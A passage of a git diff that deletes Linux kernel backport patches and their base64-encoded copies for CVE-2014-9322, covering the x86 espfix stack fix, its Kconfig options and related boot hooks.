dvdG8gZG9uZTsKKworCW11dGV4X2xvY2soJmVzcGZpeF9pbml0X211dGV4KTsKKworCS8qIERpZCB3ZSByYWNlIG9uIHRoZSBsb2NrPyAqLworCXN0YWNrX3BhZ2UgPSBBQ0NFU1NfT05DRShlc3BmaXhfcGFnZXNbcGFnZV0pOworCWlmIChzdGFja19wYWdlKQorCQlnb3RvIHVubG9ja19kb25lOworCisJcHRlbWFzayA9IF9fc3VwcG9ydGVkX3B0ZV9tYXNrOworCisJcHVkX3AgPSAmZXNwZml4X3B1ZF9wYWdlW3B1ZF9pbmRleChhZGRyKV07CisJcHVkID0gKnB1ZF9wOworCWlmICghcHVkX3ByZXNlbnQocHVkKSkgeworCQlwbWRfcCA9IChwbWRfdCAqKV9fZ2V0X2ZyZWVfcGFnZShQR0FMTE9DX0dGUCk7CisJCXB1ZCA9IF9fcHVkKF9fcGEocG1kX3ApIHwgKFBHVEFCTEVfUFJPVCAmIHB0ZW1hc2spKTsKKwkJcGFyYXZpcnRfYWxsb2NfcHVkKCZpbml0X21tLCBfX3BhKHBtZF9wKSA+PiBQQUdFX1NISUZUKTsKKwkJZm9yIChuID0gMDsgbiA8IEVTUEZJWF9QVURfQ0xPTkVTOyBuKyspCisJCQlzZXRfcHVkKCZwdWRfcFtuXSwgcHVkKTsKKwl9CisKKwlwbWRfcCA9IHBtZF9vZmZzZXQoJnB1ZCwgYWRkcik7CisJcG1kID0gKnBtZF9wOworCWlmICghcG1kX3ByZXNlbnQocG1kKSkgeworCQlwdGVfcCA9IChwdGVfdCAqKV9fZ2V0X2ZyZWVfcGFnZShQR0FMTE9DX0dGUCk7CisJCXBtZCA9IF9fcG1kKF9fcGEocHRlX3ApIHwgKFBHVEFCTEVfUFJPVCAmIHB0ZW1hc2spKTsKKwkJcGFyYXZpcnRfYWxsb2NfcG1kKCZpbml0X21tLCBfX3BhKHB0ZV9wKSA+PiBQQUdFX1NISUZUKTsKKwkJZm9yIChuID0gMDsgbiA8IEVTUEZJWF9QTURfQ0xPTkVTOyBuKyspCisJCQlzZXRfcG1kKCZwbWRfcFtuXSwgcG1kKTsKKwl9CisKKwlwdGVfcCA9IHB0ZV9vZmZzZXRfa2VybmVsKCZwbWQsIGFkZHIpOworCXN0YWNrX3BhZ2UgPSAodm9pZCAqKV9fZ2V0X2ZyZWVfcGFnZShHRlBfS0VSTkVMKTsKKwlwdGUgPSBfX3B0ZShfX3BhKHN0YWNrX3BhZ2UpIHwgKF9fUEFHRV9LRVJORUxfUk8gJiBwdGVtYXNrKSk7CisJcGFyYXZpcnRfYWxsb2NfcHRlKCZpbml0X21tLCBfX3BhKHN0YWNrX3BhZ2UpID4+IFBBR0VfU0hJRlQpOworCWZvciAobiA9IDA7IG4gPCBFU1BGSVhfUFRFX0NMT05FUzsgbisrKQorCQlzZXRfcHRlKCZwdGVfcFtuKlBURV9TVFJJREVdLCBwdGUpOworCisJLyogSm9iIGlzIGRvbmUgZm9yIHRoaXMgQ1BVIGFuZCBhbnkgQ1BVIHdoaWNoIHNoYXJlcyB0aGlzIHBhZ2UgKi8KKwlBQ0NFU1NfT05DRShlc3BmaXhfcGFnZXNbcGFnZV0pID0gc3RhY2tfcGFnZTsKKwordW5sb2NrX2RvbmU6CisJbXV0ZXhfdW5sb2NrKCZlc3BmaXhfaW5pdF9tdXRleCk7Citkb25lOgorCXRoaXNfY3B1X3dyaXRlKGVzcGZpeF9zdGFjaywgYWRkcik7CisJdGhpc19jcHVfd3JpdGUoZXNwZml4X3dhZGRyLCAodW5zaWduZWQgbG9uZylzdGFja19wYWdlCisJCSAgICAgICArIChhZGRyICYgflBBR0VfTUFTSykpOworfQpkaWZmIC0tZ2l0IGEvYXJjaC94ODYva2VybmVsL3NtcGJvb3QuYyBiL2FyY2gveDg2L2tlcm5lbC9zbXBib290LmMKaW5kZXggYmZkMzQ4ZS4uOWYwMDljYyAxMDA2NDQKLS0tIGEvYXJjaC94ODYva2VybmVsL3NtcGJvb3QuYworKysgYi9hcmNoL3g4Ni9rZXJuZWwvc21wYm9vdC5jCkBAIC0yNjUsNiArMjY1LDEzIEBACiAJY2hlY2tfdHNjX3N5bmNfdGFyZ2V0KCk7CiAKIAkvKgorCSAqIEVuYWJsZSB0aGUgZXNwZml4IGhhY2sgZm9yIHRoaXMgQ1BVCisJICovCisjaWZkZWYgQ09ORklHX1g4Nl82NAorCWluaXRfZXNwZml4X2FwKCk7CisjZW5kaWYKKworCS8qCiAJICogV2UgbmVlZCB0byBob2xkIHZlY3Rvcl9sb2NrIHNvIHRoZXJlIHRoZSBzZXQgb2Ygb25saW5lIGNwdXMKIAkgKiBkb2VzIG5vdCBjaGFuZ2Ugd2hpbGUgd2UgYXJlIGFzc2lnbmluZyB2ZWN0b3JzIHRvIGNwdXMuICBIb2xkaW5nCiAJICogdGhpcyBsb2NrIGVuc3VyZXMgd2UgZG9uJ3QgaGFsZiBhc3NpZ24gb3IgcmVtb3ZlIGFuIGlycSBmcm9tIGEgY3B1LgpkaWZmIC0tZ2l0IGEvYXJjaC94ODYvbW0vZHVtcF9wYWdldGFibGVzLmMgYi9hcmNoL3g4Ni9tbS9kdW1wX3BhZ2V0YWJsZXMuYwppbmRleCAwMDAyYTNhLi5lMDRlNjc3IDEwMDY0NAotLS0gYS9hcmNoL3g4Ni9tbS9kdW1wX3BhZ2V0YWJsZXMuYworKysgYi9hcmNoL3g4Ni9tbS9kdW1wX3BhZ2V0YWJsZXMuYwpAQCAtMzAsMTEgKzMwLDEzIEBACiAJdW5zaWduZWQgbG9uZyBzdGFydF9hZGRyZXNzOwogCXVuc2lnbmVkIGxvbmcgY3VycmVudF9hZGRyZXNzOwogCWNvbnN0IHN0cnVjdCBhZGRyX21hcmtlciAqbWFya2VyOworCXVuc2lnbmVkIGxvbmcgbGluZXM7CiB9OwogCiBzdHJ1Y3QgYWRkcl9tYXJrZXIgewogCXVuc2lnbmVkIGxvbmcgc3RhcnRfYWRkcmVzczsKIAljb25zdCBjaGFyICpuYW1lOworCXVuc2lnbmVkIGxvbmcgbWF4X2xpbmVzOwogfTsKIAogLyogaW5kaWNlcyBmb3IgYWRkcmVzc19tYXJrZXJzOyBrZWVwIHN5bmMnZCB3LyBhZGRyZXNzX21hcmtlcnMgYmVsb3cgKi8KQEAgLTQ1LDYgKzQ3LDcgQEAKIAlMT1dfS0VSTkVMX05SLAogCVZNQUxMT0NfU1RBUlRfTlIsCiAJVk1FTU1BUF9TVEFSVF9OUiwKKwlFU1BGSVhfU1RBUlRfTlIsCiAJSElHSF9LRVJORUxfTlIsCiAJTU9EVUxFU19WQUREUl9OUiwKIAlNT0RVTEVTX0VORF9OUiwKQEAgLTY3LDYgKzcwLDcgQEAKIAl7IFBBR0VfT0ZGU0VULAkJIkxvdyBLZXJuZWwgTWFwcGluZyIgfSwKIAl7IFZNQUxMT0NfU1RBUlQsICAgICAgICAidm1hbGxvYygpIEFyZWEiIH0sCiAJeyBWTUVNTUFQX1NUQVJULCAgICAgICAgIlZtZW1tYXAiIH0sCisJeyBFU1BGSVhfQkFTRV9BRERSLAkiRVNQZml4IEFyZWEiLCAxNiB9LAogCXsgX19TVEFSVF9LRVJORUxfbWFwLCAgICJIaWdoIEtlcm5lbCBNYXBwaW5nIiB9LAogCXsgTU9EVUxFU19WQUREUiwgICAgICAgICJNb2R1bGVzIiB9LAogCXsgTU9EVUxFU19FTkQsICAgICAgICAgICJFbmQgTW9kdWxlcyIgfSwKQEAgLTE2Myw3ICsxNjcsNyBAQAogCQkgICAgICBwZ3Byb3RfdCBuZXdfcHJvdCwgaW50IGxldmVsKQogewogCXBncHJvdHZhbF90IHByb3QsIGN1cjsKLQlzdGF0aWMgY29uc3QgY2hhciB1bml0c1tdID0gIktNR1RQRSI7CisJc3RhdGljIGNvbnN0IGNoYXIgdW5pdHNbXSA9ICJCS01HVFBFIjsKIAogCS8qCiAJICogSWYgd2UgaGF2ZSBhICJicmVhayIgaW4gdGhlIHNlcmllcywgd2UgbmVlZCB0byBmbHVzaCB0aGUgc3RhdGUgdGhhdApAQCAtMTc4LDYgKzE4Miw3IEBACiAJCXN0LT5jdXJyZW50X3Byb3QgPSBuZXdfcHJvdDsKIAkJc3QtPmxldmVsID0gbGV2ZWw7CiAJCXN0LT5tYXJrZXIgPSBhZGRyZXNzX21hcmtlcnM7CisJCXN0LT5saW5lcyA9IDA7CiAJCXNlcV9wcmludGYobSwgIi0tLVsgJXMgXS0tLVxuIiwgc3QtPm1hcmtlci0+bmFtZSk7CiAJfSBlbHNlIGlmIChwcm90ICE9IGN1ciB8fCBsZXZlbCAhPSBzdC0+bGV2ZWwgfHwKIAkJICAgc3QtPmN1cnJlbnRfYWRkcmVzcyA+PSBzdC0+bWFya2VyWzFdLnN0YXJ0X2FkZHJlc3MpIHsKQEAgLTE4OCwxNyArMTkzLDIxIEBACiAJCS8qCiAJCSAqIE5vdyBwcmludCB0aGUgYWN0dWFsIGZpbmlzaGVkIHNlcmllcwogCQkgKi8KLQkJc2VxX3ByaW50ZihtLCAiMHglMCpseC0weCUwKmx4ICAgIiwKLQkJCSAgIHdpZHRoLCBzdC0+c3RhcnRfYWRkcmVzcywKLQkJCSAgIHdpZHRoLCBzdC0+Y3VycmVudF9hZGRyZXNzKTsKKwkJaWYgKCFzdC0+bWFya2VyLT5tYXhfbGluZXMgfHwKKwkJICAgIHN0LT5saW5lcyA8IHN0LT5tYXJrZXItPm1heF9saW5lcykgeworCQkJc2VxX3ByaW50ZihtLCAiMHglMCpseC0weCUwKmx4ICAgIiwKKwkJCQkgICB3aWR0aCwgc3QtPnN0YXJ0X2FkZHJlc3MsCisJCQkJICAgd2lkdGgsIHN0LT5jdXJyZW50X2FkZHJlc3MpOwogCi0JCWRlbHRhID0gKHN0LT5jdXJyZW50X2FkZHJlc3MgLSBzdC0+c3RhcnRfYWRkcmVzcykgPj4gMTA7Ci0JCXdoaWxlICghKGRlbHRhICYgMTAyMykgJiYgdW5pdFsxXSkgewotCQkJZGVsdGEgPj49IDEwOwotCQkJdW5pdCsrOworCQkJZGVsdGEgPSAoc3QtPmN1cnJlbnRfYWRkcmVzcyAtIHN0LT5zdGFydF9hZGRyZXNzKTsKKwkJCXdoaWxlICghKGRlbHRhICYgMTAyMykgJiYgdW5pdFsxXSkgeworCQkJCWRlbHRhID4+PSAxMDsKKwkJCQl1bml0Kys7CisJCQl9CisJCQlzZXFfcHJpbnRmKG0sICIlOWx1JWMgIiwgZGVsdGEsICp1bml0KTsKKwkJCXByaW50a19wcm90KG0sIHN0LT5jdXJyZW50X3Byb3QsIHN0LT5sZXZlbCk7CiAJCX0KLQkJc2VxX3ByaW50ZihtLCAiJTlsdSVjICIsIGRlbHRhLCAqdW5pdCk7Ci0JCXByaW50a19wcm90KG0sIHN0LT5jdXJyZW50X3Byb3QsIHN0LT5sZXZlbCk7CisJCXN0LT5saW5lcysrOwogCiAJCS8qCiAJCSAqIFdlIHByaW50IG1hcmtlcnMgZm9yIHNwZWNpYWwgYXJlYXMgb2YgYWRkcmVzcyBzcGFjZSwKQEAgLTIwNiw3ICsyMTUsMTUgQEAKIAkJICogVGhpcyBoZWxwcyBpbiB0aGUgaW50ZXJwcmV0YXRpb24uCiAJCSAqLwogCQlpZiAoc3QtPmN1cnJlbnRfYWRkcmVzcyA+PSBzdC0+bWFya2VyWzFdLnN0YXJ0X2FkZHJlc3MpIHsKKwkJCWlmIChzdC0+bWFya2VyLT5tYXhfbGluZXMgJiYKKwkJCSAgICBzdC0+bGluZXMgPiBzdC0+bWFya2VyLT5tYXhfbGluZXMpIHsKKwkJCQl1bnNpZ25lZCBsb25nIG5za2lwID0KKwkJCQkJc3QtPmxpbmVzIC0gc3QtPm1hcmtlci0+bWF4X2xpbmVzOworCQkJCXNlcV9wcmludGYobSwgIi4uLiAlbHUgZW50ciVzIHNraXBwZWQgLi4uIFxuIiwKKwkJCQkJICAgbnNraXAsIG5za2lwID09IDEgPyAieSIgOiAiaWVzIik7CisJCQl9CiAJCQlzdC0+bWFya2VyKys7CisJCQlzdC0+bGluZXMgPSAwOwogCQkJc2VxX3ByaW50ZihtLCAiLS0tWyAlcyBdLS0tXG4iLCBzdC0+bWFya2VyLT5uYW1lKTsKIAkJfQogCmRpZmYgLS1naXQgYS9pbml0L21haW4uYyBiL2luaXQvbWFpbi5jCmluZGV4IDk0ODRmNGIuLmE5ZTRhNzYgMTAwNjQ0Ci0tLSBhL2luaXQvbWFpbi5jCisrKyBiL2luaXQvbWFpbi5jCkBAIC02MDUsNiArNjA1LDEwIEBACiAJaWYgKGVmaV9lbmFibGVkKEVGSV9SVU5USU1FX1NFUlZJQ0VTKSkKIAkJZWZpX2VudGVyX3ZpcnR1YWxfbW9kZSgpOwogI2VuZGlmCisjaWZkZWYgQ09ORklHX1g4Nl82NAorCS8qIFNob3VsZCBiZSBydW4gYmVmb3JlIHRoZSBmaXJzdCBub24taW5pdCB0aHJlYWQgaXMgY3JlYXRlZCAqLworCWluaXRfZXNwZml4X2JzcCgpOworI2VuZGlmCiAJdGhyZWFkX2luZm9fY2FjaGVfaW5pdCgpOwogCWNyZWRfaW5pdCgpOwogCWZvcmtfaW5pdCh0b3RhbHJhbV9wYWdlcyk7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0003.patch
deleted file mode 100644
index 1b5acc63..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0003.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-diff --git a/arch/x86/include/asm/espfix.h b/arch/x86/include/asm/espfix.h
-new file mode 100644
-index 0000000..729051c
---- /dev/null
-+++ b/arch/x86/include/asm/espfix.h
-@@ -0,0 +1,16 @@
-+#ifdef _ASM_X86_ESPFIX_H
-+#define _ASM_X86_ESPFIX_H
-+
-+#ifdef CONFIG_X86_64
-+
-+#include <asm/percpu.h>
-+
-+DECLARE_PER_CPU_READ_MOSTLY(unsigned long, espfix_stack);
-+DECLARE_PER_CPU_READ_MOSTLY(unsigned long, espfix_waddr);
-+
-+extern void init_espfix_bsp(void);
-+extern void init_espfix_ap(void);
-+
-+#endif /* CONFIG_X86_64 */
-+
-+#endif /* _ASM_X86_ESPFIX_H */
-diff --git a/arch/x86/include/asm/setup.h b/arch/x86/include/asm/setup.h
-index 93797d1..2e327f1 100644
---- a/arch/x86/include/asm/setup.h
-+++ b/arch/x86/include/asm/setup.h
-@@ -60,11 +60,10 @@
- static inline void x86_ce4100_early_setup(void) { }
- #endif
- 
--extern void init_espfix_bsp(void);
--extern void init_espfix_ap(void);
--
- #ifndef _SETUP
- 
-+#include <asm/espfix.h>
-+
- /*
-  * This is set up by the setup-routine at boot-time
-  */
-diff --git a/arch/x86/kernel/espfix_64.c b/arch/x86/kernel/espfix_64.c
-index 8a64da3..6afbb16 100644
---- a/arch/x86/kernel/espfix_64.c
-+++ b/arch/x86/kernel/espfix_64.c
-@@ -40,6 +40,7 @@
- #include <asm/pgtable.h>
- #include <asm/pgalloc.h>
- #include <asm/setup.h>
-+#include <asm/espfix.h>
- 
- /*
-  * Note: we only need 6*8 = 48 bytes for the espfix stack, but round
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0003.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0003.patch.base64
deleted file mode 100644
index cbc57804..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2FyY2gveDg2L2luY2x1ZGUvYXNtL2VzcGZpeC5oIGIvYXJjaC94ODYvaW5jbHVkZS9hc20vZXNwZml4LmgKbmV3IGZpbGUgbW9kZSAxMDA2NDQKaW5kZXggMDAwMDAwMC4uNzI5MDUxYwotLS0gL2Rldi9udWxsCisrKyBiL2FyY2gveDg2L2luY2x1ZGUvYXNtL2VzcGZpeC5oCkBAIC0wLDAgKzEsMTYgQEAKKyNpZmRlZiBfQVNNX1g4Nl9FU1BGSVhfSAorI2RlZmluZSBfQVNNX1g4Nl9FU1BGSVhfSAorCisjaWZkZWYgQ09ORklHX1g4Nl82NAorCisjaW5jbHVkZSA8YXNtL3BlcmNwdS5oPgorCitERUNMQVJFX1BFUl9DUFVfUkVBRF9NT1NUTFkodW5zaWduZWQgbG9uZywgZXNwZml4X3N0YWNrKTsKK0RFQ0xBUkVfUEVSX0NQVV9SRUFEX01PU1RMWSh1bnNpZ25lZCBsb25nLCBlc3BmaXhfd2FkZHIpOworCitleHRlcm4gdm9pZCBpbml0X2VzcGZpeF9ic3Aodm9pZCk7CitleHRlcm4gdm9pZCBpbml0X2VzcGZpeF9hcCh2b2lkKTsKKworI2VuZGlmIC8qIENPTkZJR19YODZfNjQgKi8KKworI2VuZGlmIC8qIF9BU01fWDg2X0VTUEZJWF9IICovCmRpZmYgLS1naXQgYS9hcmNoL3g4Ni9pbmNsdWRlL2FzbS9zZXR1cC5oIGIvYXJjaC94ODYvaW5jbHVkZS9hc20vc2V0dXAuaAppbmRleCA5Mzc5N2QxLi4yZTMyN2YxIDEwMDY0NAotLS0gYS9hcmNoL3g4Ni9pbmNsdWRlL2FzbS9zZXR1cC5oCisrKyBiL2FyY2gveDg2L2luY2x1ZGUvYXNtL3NldHVwLmgKQEAgLTYwLDExICs2MCwxMCBAQAogc3RhdGljIGlubGluZSB2b2lkIHg4Nl9jZTQxMDBfZWFybHlfc2V0dXAodm9pZCkgeyB9CiAjZW5kaWYKIAotZXh0ZXJuIHZvaWQgaW5pdF9lc3BmaXhfYnNwKHZvaWQpOwotZXh0ZXJuIHZvaWQgaW5pdF9lc3BmaXhfYXAodm9pZCk7Ci0KICNpZm5kZWYgX1NFVFVQCiAKKyNpbmNsdWRlIDxhc20vZXNwZml4Lmg+CisKIC8qCiAgKiBUaGlzIGlzIHNldCB1cCBieSB0aGUgc2V0dXAtcm91dGluZSBhdCBib290LXRpbWUKICAqLwpkaWZmIC0tZ2l0IGEvYXJjaC94ODYva2VybmVsL2VzcGZpeF82NC5jIGIvYXJjaC94ODYva2VybmVsL2VzcGZpeF82NC5jCmluZGV4IDhhNjRkYTMuLjZhZmJiMTYgMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L2tlcm5lbC9lc3BmaXhfNjQuYworKysgYi9hcmNoL3g4Ni9rZXJuZWwvZXNwZml4XzY0LmMKQEAgLTQwLDYgKzQwLDcgQEAKICNpbmNsdWRlIDxhc20vcGd0YWJsZS5oPgogI2luY2x1ZGUgPGFzbS9wZ2FsbG9jLmg+CiAjaW5jbHVkZSA8YXNtL3NldHVwLmg+CisjaW5jbHVkZSA8YXNtL2VzcGZpeC5oPgogCiAvKgogICogTm90ZTogd2Ugb25seSBuZWVkIDYqOCA9IDQ4IGJ5dGVzIGZvciB0aGUgZXNwZml4IHN0YWNrLCBidXQgcm91bmQK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0004.patch
deleted file mode 100644
index b5a538da..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0004.patch
+++ /dev/null
@@ -1,10 +0,0 @@
-diff --git a/arch/x86/include/asm/espfix.h b/arch/x86/include/asm/espfix.h
-index 729051c..99efebb 100644
---- a/arch/x86/include/asm/espfix.h
-+++ b/arch/x86/include/asm/espfix.h
-@@ -1,4 +1,4 @@
--#ifdef _ASM_X86_ESPFIX_H
-+#ifndef _ASM_X86_ESPFIX_H
- #define _ASM_X86_ESPFIX_H
- 
- #ifdef CONFIG_X86_64
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0004.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0004.patch.base64
deleted file mode 100644
index 02e5bfdf..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0004.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2FyY2gveDg2L2luY2x1ZGUvYXNtL2VzcGZpeC5oIGIvYXJjaC94ODYvaW5jbHVkZS9hc20vZXNwZml4LmgKaW5kZXggNzI5MDUxYy4uOTllZmViYiAxMDA2NDQKLS0tIGEvYXJjaC94ODYvaW5jbHVkZS9hc20vZXNwZml4LmgKKysrIGIvYXJjaC94ODYvaW5jbHVkZS9hc20vZXNwZml4LmgKQEAgLTEsNCArMSw0IEBACi0jaWZkZWYgX0FTTV9YODZfRVNQRklYX0gKKyNpZm5kZWYgX0FTTV9YODZfRVNQRklYX0gKICNkZWZpbmUgX0FTTV9YODZfRVNQRklYX0gKIAogI2lmZGVmIENPTkZJR19YODZfNjQK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0005.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0005.patch
deleted file mode 100644
index 5a5a49c2..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0005.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
-index 4b20846..520cde8 100644
---- a/arch/x86/Kconfig
-+++ b/arch/x86/Kconfig
-@@ -972,6 +972,10 @@
- 	  XFree86 to initialize some video cards via BIOS. Disabling this
- 	  option saves about 6k.
- 
-+config X86_ESPFIX64
-+	def_bool y
-+	depends on X86_64
-+
- config TOSHIBA
- 	tristate "Toshiba Laptop support"
- 	depends on X86_32
-diff --git a/arch/x86/kernel/Makefile b/arch/x86/kernel/Makefile
-index 0fde293..111eb35 100644
---- a/arch/x86/kernel/Makefile
-+++ b/arch/x86/kernel/Makefile
-@@ -27,7 +27,7 @@
- obj-y			+= syscall_$(BITS).o
- obj-$(CONFIG_X86_64)	+= vsyscall_64.o
- obj-$(CONFIG_X86_64)	+= vsyscall_emu_64.o
--obj-$(CONFIG_X86_64)	+= espfix_64.o
-+obj-$(CONFIG_X86_ESPFIX64)	+= espfix_64.o
- obj-y			+= bootflag.o e820.o
- obj-y			+= pci-dma.o quirks.o topology.o kdebugfs.o
- obj-y			+= alternative.o i8253.o pci-nommu.o hw_breakpoint.o
-diff --git a/arch/x86/kernel/smpboot.c b/arch/x86/kernel/smpboot.c
-index 9f009cc..fe86275 100644
---- a/arch/x86/kernel/smpboot.c
-+++ b/arch/x86/kernel/smpboot.c
-@@ -267,7 +267,7 @@
- 	/*
- 	 * Enable the espfix hack for this CPU
- 	 */
--#ifdef CONFIG_X86_64
-+#ifdef CONFIG_X86_ESPFIX64
- 	init_espfix_ap();
- #endif
- 
-diff --git a/init/main.c b/init/main.c
-index a9e4a76..544cccf 100644
---- a/init/main.c
-+++ b/init/main.c
-@@ -605,7 +605,7 @@
- 	if (efi_enabled(EFI_RUNTIME_SERVICES))
- 		efi_enter_virtual_mode();
- #endif
--#ifdef CONFIG_X86_64
-+#ifdef CONFIG_X86_ESPFIX64
- 	/* Should be run before the first non-init thread is created */
- 	init_espfix_bsp();
- #endif
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0005.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0005.patch.base64
deleted file mode 100644
index dd10351b..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0005.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2FyY2gveDg2L0tjb25maWcgYi9hcmNoL3g4Ni9LY29uZmlnCmluZGV4IDRiMjA4NDYuLjUyMGNkZTggMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L0tjb25maWcKKysrIGIvYXJjaC94ODYvS2NvbmZpZwpAQCAtOTcyLDYgKzk3MiwxMCBAQAogCSAgWEZyZWU4NiB0byBpbml0aWFsaXplIHNvbWUgdmlkZW8gY2FyZHMgdmlhIEJJT1MuIERpc2FibGluZyB0aGlzCiAJICBvcHRpb24gc2F2ZXMgYWJvdXQgNmsuCiAKK2NvbmZpZyBYODZfRVNQRklYNjQKKwlkZWZfYm9vbCB5CisJZGVwZW5kcyBvbiBYODZfNjQKKwogY29uZmlnIFRPU0hJQkEKIAl0cmlzdGF0ZSAiVG9zaGliYSBMYXB0b3Agc3VwcG9ydCIKIAlkZXBlbmRzIG9uIFg4Nl8zMgpkaWZmIC0tZ2l0IGEvYXJjaC94ODYva2VybmVsL01ha2VmaWxlIGIvYXJjaC94ODYva2VybmVsL01ha2VmaWxlCmluZGV4IDBmZGUyOTMuLjExMWViMzUgMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L2tlcm5lbC9NYWtlZmlsZQorKysgYi9hcmNoL3g4Ni9rZXJuZWwvTWFrZWZpbGUKQEAgLTI3LDcgKzI3LDcgQEAKIG9iai15CQkJKz0gc3lzY2FsbF8kKEJJVFMpLm8KIG9iai0kKENPTkZJR19YODZfNjQpCSs9IHZzeXNjYWxsXzY0Lm8KIG9iai0kKENPTkZJR19YODZfNjQpCSs9IHZzeXNjYWxsX2VtdV82NC5vCi1vYmotJChDT05GSUdfWDg2XzY0KQkrPSBlc3BmaXhfNjQubworb2JqLSQoQ09ORklHX1g4Nl9FU1BGSVg2NCkJKz0gZXNwZml4XzY0Lm8KIG9iai15CQkJKz0gYm9vdGZsYWcubyBlODIwLm8KIG9iai15CQkJKz0gcGNpLWRtYS5vIHF1aXJrcy5vIHRvcG9sb2d5Lm8ga2RlYnVnZnMubwogb2JqLXkJCQkrPSBhbHRlcm5hdGl2ZS5vIGk4MjUzLm8gcGNpLW5vbW11Lm8gaHdfYnJlYWtwb2ludC5vCmRpZmYgLS1naXQgYS9hcmNoL3g4Ni9rZXJuZWwvc21wYm9vdC5jIGIvYXJjaC94ODYva2VybmVsL3NtcGJvb3QuYwppbmRleCA5ZjAwOWNjLi5mZTg2Mjc1IDEwMDY0NAotLS0gYS9hcmNoL3g4Ni9rZXJuZWwvc21wYm9vdC5jCisrKyBiL2FyY2gveDg2L2tlcm5lbC9zbXBib290LmMKQEAgLTI2Nyw3ICsyNjcsNyBAQAogCS8qCiAJICogRW5hYmxlIHRoZSBlc3BmaXggaGFjayBmb3IgdGhpcyBDUFUKIAkgKi8KLSNpZmRlZiBDT05GSUdfWDg2XzY0CisjaWZkZWYgQ09ORklHX1g4Nl9FU1BGSVg2NAogCWluaXRfZXNwZml4X2FwKCk7CiAjZW5kaWYKIApkaWZmIC0tZ2l0IGEvaW5pdC9tYWluLmMgYi9pbml0L21haW4uYwppbmRleCBhOWU0YTc2Li41NDRjY2NmIDEwMDY0NAotLS0gYS9pbml0L21haW4uYworKysgYi9pbml0L21haW4uYwpAQCAtNjA1LDcgKzYwNSw3IEBACiAJaWYgKGVmaV9lbmFibGVkKEVGSV9SVU5USU1FX1NFUlZJQ0VTKSkKIAkJZWZpX2VudGVyX3ZpcnR1YWxfbW9kZSgpOwogI2VuZGlmCi0jaWZkZWYgQ09ORklHX1g4Nl82NAorI2lmZGVmIENPTkZJR19YODZfRVNQRklYNjQKIAkvKiBTaG91bGQgYmUgcnVuIGJlZm9yZSB0aGUgZmlyc3Qgbm9uLWluaXQgdGhyZWFkIGlzIGNyZWF0ZWQgKi8KIAlpbml0X2VzcGZpeF9ic3AoKTsKICNlbmRpZgo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0006.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0006.patch
deleted file mode 100644
index 2f014227..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0006.patch
+++ /dev/null
@@ -1,195 +0,0 @@
-diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
-index 520cde8..2b6c572 100644
---- a/arch/x86/Kconfig
-+++ b/arch/x86/Kconfig
-@@ -967,14 +967,27 @@
- 	default y
- 	depends on X86_32
- 	---help---
--	  This option is required by programs like DOSEMU to run 16-bit legacy
--	  code on X86 processors. It also may be needed by software like
--	  XFree86 to initialize some video cards via BIOS. Disabling this
--	  option saves about 6k.
-+	  This option is required by programs like DOSEMU to run
-+	  16-bit real mode legacy code on x86 processors. It also may
-+	  be needed by software like XFree86 to initialize some video
-+	  cards via BIOS. Disabling this option saves about 6K.
-+
-+config X86_16BIT
-+	bool "Enable support for 16-bit segments" if EXPERT
-+	default y
-+	---help---
-+	  This option is required by programs like Wine to run 16-bit
-+	  protected mode legacy code on x86 processors.  Disabling
-+	  this option saves about 300 bytes on i386, or around 6K text
-+	  plus 16K runtime memory on x86-64,
-+
-+config X86_ESPFIX32
-+	def_bool y
-+	depends on X86_16BIT && X86_32
- 
- config X86_ESPFIX64
- 	def_bool y
--	depends on X86_64
-+	depends on X86_16BIT && X86_64
- 
- config TOSHIBA
- 	tristate "Toshiba Laptop support"
-diff --git a/arch/x86/kernel/entry_32.S b/arch/x86/kernel/entry_32.S
-index 41baa1f..e758e2f 100644
---- a/arch/x86/kernel/entry_32.S
-+++ b/arch/x86/kernel/entry_32.S
-@@ -530,6 +530,7 @@
- restore_all:
- 	TRACE_IRQS_IRET
- restore_all_notrace:
-+#ifdef CONFIG_X86_ESPFIX32
- 	movl PT_EFLAGS(%esp), %eax	# mix EFLAGS, SS and CS
- 	# Warning: PT_OLDSS(%esp) contains the wrong/random values if we
- 	# are returning to the kernel.
-@@ -540,6 +541,7 @@
- 	cmpl $((SEGMENT_LDT << 8) | USER_RPL), %eax
- 	CFI_REMEMBER_STATE
- 	je ldt_ss			# returning to user-space with LDT SS
-+#endif
- restore_nocheck:
- 	RESTORE_REGS 4			# skip orig_eax/error_code
- irq_return:
-@@ -552,6 +554,7 @@
- .previous
- 	_ASM_EXTABLE(irq_return,iret_exc)
- 
-+#ifdef CONFIG_X86_ESPFIX32
